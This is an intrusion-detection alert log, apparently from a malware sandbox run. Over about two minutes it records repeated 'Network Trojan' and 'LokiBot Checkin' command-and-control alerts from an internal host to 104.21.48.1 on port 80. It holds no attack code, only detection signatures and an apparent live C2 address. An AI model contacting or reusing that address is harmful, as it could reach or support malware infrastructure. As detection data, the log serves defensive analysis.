2025-02-24T08:40:30.783053+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:31.680292+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:32.626524+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:33.507918+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:34.380612+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.304291+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:36.116918+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.997752+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:37.911290+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:39.155461+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:40.047671+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:41.994933+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:42.978187+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:43.948897+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:44.899170+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:45.778880+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:46.710799+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:47.657941+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:48.538949+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:49.331683+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.240893+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:51.171451+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:52.226264+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:53.501662+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:54.486059+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:55.408746+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:56.514458+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:57.431407+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:59.521477+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:41:00.499203+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:01.471056+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:02.439271+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:03.364815+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:04.363415+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:05.313428+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.266860+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:07.223130+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:08.207649+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.194590+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:10.164113+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:11.141303+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:12.035898+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.870311+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:13.692580+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:14.622816+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:15.553276+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:16.510554+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:17.303496+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.267430+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:19.069504+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:20.023495+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.935903+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:21.822435+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:22.752347+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:23.553323+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:24.528729+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:25.873164+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:26.796281+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:27.699453+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:28.632962+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:29.560064+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:30.385197+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:32.375440+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:33.318019+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:34.228783+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:36.156446+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:37.082916+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.904806+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:38.784207+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:39.724001+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:40.692767+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:41.656178+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:42.463936+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:43.517139+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:44.504524+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:45.459662+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:46.390858+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.206897+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:48.126137+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:49.029933+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:50.011745+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.928050+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:51.872918+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:52.792423+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:53.723999+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:54.716435+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:55.674938+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:56.522266+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:57.500735+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:58.460867+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:59.399541+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.348044+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:01.147226+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:02.070942+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.918392+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:03.899121+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:04.860065+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:05.803640+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:06.751125+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:07.557952+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.365524+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:09.184226+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.985917+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:10.825701+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:11.653601+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:12.595333+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:13.404659+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:14.333926+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.296100+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:16.085309+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:16.940915+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50130	104.21.48.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T08:40:16.802412+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49731	104.21.48.1	80	TCP
2025-02-24T08:40:17.901955+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.48.1	80	TCP
2025-02-24T08:40:18.787788+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:19.696595+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:20.599802+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:21.503176+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:22.404608+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:23.289335+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:24.218133+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.164608+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:26.089207+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:27.042767+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.977477+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:28.861062+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:29.817332+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:30.783053+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:31.680292+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:32.626524+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:33.507918+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:34.380612+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.304291+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:36.116918+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.997752+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:37.911290+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:39.155461+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:40.047671+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:41.994933+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:42.978187+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:43.948897+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:44.899170+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:45.778880+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:46.710799+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:47.657941+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:48.538949+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:49.331683+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.240893+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:51.171451+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:52.226264+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:53.501662+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:54.486059+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:55.408746+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:56.514458+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:57.431407+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:59.521477+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:41:00.499203+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:01.471056+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:02.439271+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:03.364815+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:04.363415+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:05.313428+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.266860+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:07.223130+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:08.207649+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.194590+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:10.164113+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:11.141303+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:12.035898+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.870311+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:13.692580+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:14.622816+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:15.553276+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:16.510554+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:17.303496+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.267430+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:19.069504+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:20.023495+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.935903+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:21.822435+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:22.752347+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:23.553323+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:24.528729+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:25.873164+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:26.796281+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:27.699453+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:28.632962+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:29.560064+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:30.385197+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:32.375440+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:33.318019+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:34.228783+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:36.156446+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:37.082916+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.904806+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:38.784207+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:39.724001+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:40.692767+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:41.656178+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:42.463936+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:43.517139+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:44.504524+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:45.459662+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:46.390858+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.206897+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:48.126137+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:49.029933+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:50.011745+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.928050+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:51.872918+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:52.792423+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:53.723999+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:54.716435+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:55.674938+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:56.522266+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:57.500735+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:58.460867+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:59.399541+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.348044+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:01.147226+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:02.070942+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.918392+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:03.899121+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:04.860065+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:05.803640+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:06.751125+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:07.557952+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.365524+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:09.184226+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.985917+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:10.825701+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:11.653601+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:12.595333+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:13.404659+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:14.333926+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.296100+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:16.085309+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50129	104.21.48.1	80	TCP
